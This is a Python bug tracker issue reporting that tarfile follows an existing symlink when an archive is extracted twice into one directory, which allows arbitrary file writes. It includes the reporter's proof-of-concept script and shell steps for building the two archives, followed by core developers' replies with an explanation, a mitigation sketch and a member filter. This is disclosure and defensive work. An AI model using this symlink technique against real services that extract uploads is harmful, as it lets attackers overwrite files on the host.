classification
Title: "tarfile" library will lead to "write any content to any file on the host".
Type: security
Stage:
Components: Library (Lib)
Versions: Python 3.7
process
Status: open
Resolution:
Dependencies:
Superseder:
Assigned To:
Nosy List: eric.araujo, gregory.p.smith, leveryd
Priority: normal
Keywords:

Created on 2021-05-03 17:44 by leveryd, last changed 2021-05-08 03:14 by gregory.p.smith.

Files
File name Uploaded Description
poc.tar.gz leveryd, 2021-05-03 17:44
Messages (3)
msg392827 - Author: guangli dong (leveryd) Date: 2021-05-03 17:44
If tar files are extracted twice into the same directory, an attacker can "write any content to any file on the host".

PoC code:
```
import tarfile


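dir_name = "/tmp/anything"
# Archive 1 holds a symlink test_tar/a -> /tmp/a. Built with (assuming cwd is /tmp):
#   mkdir test_tar; ln -sv /tmp/a test_tar/a; tar -cvf a.tar.gz test_tar/a
file1_name = "/tmp/a.tar.gz"
# Archive 2 holds a regular file at the same member path. Built with (assuming cwd is /tmp):
#   echo "it is just poc" > /tmp/payload; rm -rf test_tar; mkdir test_tar; cp /tmp/payload test_tar/a; tar -cvf b.tar.gz test_tar/a
file2_name = "/tmp/b.tar.gz"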


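def vuln_tar(tar_path):
    """
    Extract every member of the archive at tar_path into dir_name.

    :param tar_path: path of the tar archive to extract
    :return: None
    """
    # "r:tar" opens the archive as an uncompressed tar; the archives above are
    # created with `tar -cvf`, so they are not gzipped despite the .tar.gz name.
    with tarfile.open(tar_path, "r:tar") as tar:
        for file_name in tar.getnames():
            # Per this report, an existing symlink at the destination is followed.
            tar.extract(file_name, dir_name)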


vuln_tar(file1_name)
vuln_tar(file2_name)
```

In this PoC, if a service extracts attacker-uploaded tar files into "dir_name" twice, the attacker can create "/tmp/a" and write the string "it is just poc" into it.
msg393219 - Author: Éric Araujo (eric.araujo) * (Python committer) Date: 2021-05-07 20:28
Can you contact the security team (info at https://www.python.org/dev/security/ ) directly?

In general, tarfile (and other Python file functions!) can create files anywhere on the filesystem, provided that the process user has the right permissions.  But it seems that you’re talking about an unexpected behaviour leading to unwanted operations, so please send more details about the problem to the team.  Thank you for your report!
msg393234 - Author: Gregory P. Smith (gregory.p.smith) * (Python committer) Date: 2021-05-08 03:14
TL;DR - Extracting a tar file doesn't check whether it is overwriting an existing file. That file could be a symlink pointing elsewhere, in which case the contents of the symlink's target get clobbered, assuming the target file exists.
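
The underlying behaviour can be shown without tarfile at all: opening a path for writing follows a symlink at that path. The following is a minimal sketch on a POSIX system; the function name and the file names inside the temporary directory are made up for illustration and stand in for "/tmp/a" and the extracted "test_tar/a".

```python
import os
import tempfile


def demo_symlink_clobber():
    """Write through a symlink and report what happened to its target."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "elsewhere")  # stands in for /tmp/a
        link = os.path.join(tmp, "extracted")    # stands in for dir_name/test_tar/a

        with open(target, "w") as f:
            f.write("original")
        os.symlink(target, link)

        # A plain open-for-write on the link path truncates and rewrites the
        # target; the link itself is left in place.
        with open(link, "w") as f:
            f.write("it is just poc")

        with open(target) as f:
            return f.read(), os.path.islink(link)
```

Calling `demo_symlink_clobber()` returns the target's new contents and whether the link path is still a symlink.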

Doing an unlink before opening the destination file during extract (ignoring both success and FileNotFoundError) would avoid this _specific_ case.
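
As a rough sketch of that idea, assuming a hypothetical helper named `write_unlinking_first` (this is not tarfile's actual code, just the pattern described above):

```python
import os


def write_unlinking_first(path, data):
    """Remove whatever is at path, then write data to a fresh file there."""
    try:
        # Removes a regular file or the symlink itself, never the link target.
        os.unlink(path)
    except FileNotFoundError:
        pass  # nothing was there, which is fine
    with open(path, "wb") as f:
        f.write(data)
```

With this pattern a pre-existing symlink at `path` is replaced by a regular file and its target is left untouched. A window remains between the unlink and the open, so this only covers the serialized case.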

But tarfile is already documented with a warning about untrusted inputs being able to do bad things:

https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall

Fixing this one serialized case doesn't do anything about other cases or race conditions that we won't claim protection against, so I'm not sure this issue is serious from a stdlib perspective.
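
For callers who must handle untrusted archives, the documented warning suggests inspecting members before extraction. Below is a minimal sketch of such a check, passed through the `members` argument of `extractall`. The helper names `is_within` and `checked_members` are hypothetical, the policy (regular files and directories only, resolved path must stay under the destination) is an assumption rather than anything tarfile prescribes, and it does nothing about race conditions.

```python
import os
import tarfile


def is_within(base, target):
    """True if target, after resolving symlinks on disk, lies under base."""
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return os.path.commonpath([base, target]) == base


def checked_members(tar, dest):
    """Yield only members considered safe to extract into dest."""
    for member in tar.getmembers():
        if not (member.isfile() or member.isdir()):
            continue  # skip symlinks, hard links, devices, FIFOs
        # realpath also resolves symlinks already present in dest, so a
        # member landing on a link that points outside dest is skipped.
        if not is_within(dest, os.path.join(dest, member.name)):
            continue
        yield member
```

Usage would look like `tar.extractall(dest, members=checked_members(tar, dest))`. In the PoC above, the symlink member of the first archive would be skipped, so the second extraction would write an ordinary file.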
History
Date User Action Args
2021-05-08 03:14:09 gregory.p.smith set nosy: + gregory.p.smith; messages: + msg393234
2021-05-07 20:28:21 eric.araujo set nosy: + eric.araujo; messages: + msg393219
2021-05-03 17:44:03 leveryd create